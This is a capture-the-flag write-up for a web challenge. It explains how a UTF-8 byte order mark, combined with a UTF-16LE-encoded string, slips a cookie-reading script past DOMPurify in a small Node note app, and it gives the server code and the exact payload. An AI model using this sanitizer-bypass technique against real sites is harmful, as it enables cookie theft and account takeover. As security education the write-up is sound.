These XSS vectors are getting ridiculous! So I made a secure note app. The only NPM dependency is DOMPurify, and I directly store the output of DOMPurify.sanitize and serve that back, so it has to be secure, right? It’s barely 16 LoC!

Category: Web

Solver: aes, lukasrad02

Flag: GPNCTF{UN1C0D3_15_4_N34T_4TT4CK_V3CT0R}

Writeup

As the challenge description suggests, the code for this challenge is indeed pretty compact. Thus, we can even take a look at it here in this writeup:

const DOMPurify = require('dompurify')(new (require('jsdom').JSDOM)('').window); // the only dependency!
require('fs').mkdirSync('notes', { recursive: true });
require('http').createServer((req, res) => { try {
    if (req.url === "/") {
        res.setHeader('Content-Type', 'text/html');
        res.end(`<textarea id="content"></textarea><br><button onclick="location='/submit?'+encodeURIComponent(content.value)">Submit`)
    } else if (req.url.startsWith("/submit")) {
        const content = decodeURIComponent(req.url.split('submit?')[1]);
        const id = require('crypto').randomBytes(16).toString('hex');
        console.log("Unsanitized", content)
        const sanitized = DOMPurify.sanitize(content)
        require('fs').writeFileSync(`notes/${id}.html`, sanitized, "utf-16le");
        console.log("Sanitized", sanitized)
        res.setHeader("Location", `/notes/${id}`); res.statusCode = 302; res.end();
    } else if (req.url.startsWith("/notes/")) {
        const id = (req.url.split('/notes/')[1]).match(/^[a-f0-9]{32}$/);
        res.setHeader('Content-Type', 'text/html; charset=utf-16le');
        res.end(require('fs').readFileSync(`notes/${id}.html`));
} } catch(e) {console.log(e)}}).listen(1337);

As we can see, there are only two HTTP routes that might be interesting to us. There is the /submit route that sanitizes and stores a note we submit and there is the /notes/ route that serves a stored note for an ID we provide.

When starting an instance of this challenge, we are provided with a URL for both the application server and an admin bot. This hints that we are working with a typical XSS attack where we must gain access to the cookie of the browser context of the bot.

In the application code, there are two things that stood out to us immediately: The input is sanitized using DOMPurify, and we are working with the (pretty non-standard) UTF-16LE string encoding.

DOMPurify is what prevents us from running any JavaScript code (unless we found a vulnerability in the library, but that is pretty unlikely and certainly not in scope). So, we need to find a way to circumvent this. Relatively quickly, we assumed that the text encoding must be the attack vector here.

The general idea for the exploit we came up with was as follows: We need to find a way to encode and send a string that, when analyzed by DOMPurify, does not look suspicious. When it is later served to and interpreted by the browser, it should be interpreted as valid HTML/JavaScript code that runs.

What we started out with was to construct a string that, when stored as UTF16-LE and interpreted as UTF-8 would result in valid HTML and JavaScript. This was surprisingly easy to achieve. CyberChef became incredibly useful for this. We can simply take the string we would like at the end and then UTF16-LE decode it to receive what characters we need to store to achieve the same result.

CyberChef decoding a XSS payload as UTF16-LE

When we send this payload to the server and take a look at the file that is stored there, we can see that DOMPurify did not modify anything and the stored data corresponds to our payload when interpreted as UTF-8:

3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65  |<html><head></he|
61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74  |ad><body><script|
3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28  |>document.write(|
22 43 6f 6f 6b 69 65 3a 22 20 2b 20 64 6f 63 75  |"Cookie:" + docu|
6d 65 6e 74 2e 63 6f 6f 6b 69 65 29 3b 3c 2f 73  |ment.cookie);</s|
63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68  |cript></body></h|
74 6d 6c 3e                                      |tml>|

When we now try to access that file with our browser by providing the note ID however, we find that the browser also interprets the response as UTF-16LE. Thus, it displays the characters we originally sent as the payload instead of interpreting the XSS payload. This is due to the fact that the server properly sets the Content-Type header so that the browser knows which encoding it is working with.

At this point, we were stuck for quite a while. We knew that we would need to somehow convince the browser to interpret the response as UTF-8 or ASCII to run our exploit. We knew that there are a number of heuristics that a browser uses to determine the encoding of a file returned from the server. We believed that the header from the server would take precedence in all cases but checked out what other methods are used. The Wikipedia Article on HTML encoding talks about a number of methods and references an HTML standard where a “sniffing algorithm” is defined1. What we find is that the use of Byte Order Marks (BOMs) has the highest precedence in determining the encoding of a file, even overriding the HTTP header value. As BOMs are a part of the requested file itself, and we can modify the file, this seemed like the attack vector we should pursue.

So, what exactly is BOM? The Byte Order Mark helps string decoders to detect which encoding they are working with. To do this, they check the first few bytes of a file and check whether it matches the BOM of any text encoding they know. Thus, if we set the first byte of the file returned via HTTP to the ones corresponding to UTF-8 (EF BB BF2), the browser will interpret the rest of the file as UTF-8.

This way, we can now construct our complete payload. We again take CyberChef and use the URL Decode operation to be able to combine hex encoded characters and normal strings to construct the complete payload. We also added an x in the middle to ensure that we have an even number of bytes and are thus properly aligned for UTF-16 encoding.

CyberChef constructing the complete payload

What we place in the CyberChef input is the following:

%ef%bb%bf<html><head></head><body>x<script>document.write("Cookie:" %2b document.cookie);</script></body></html>

The result is the following:

믯㲿瑨汭㰾敨摡㰾栯慥㹤戼摯㹹㱸捳楲瑰搾捯浵湥⹴牷瑩⡥䌢潯楫㩥•‫潤畣敭瑮挮潯楫⥥㰻猯牣灩㹴⼼潢祤㰾栯浴㹬

When we now store that note on the server and provide the admin bot with the note ID, we receive the flag as a screenshot from the admin bot browser.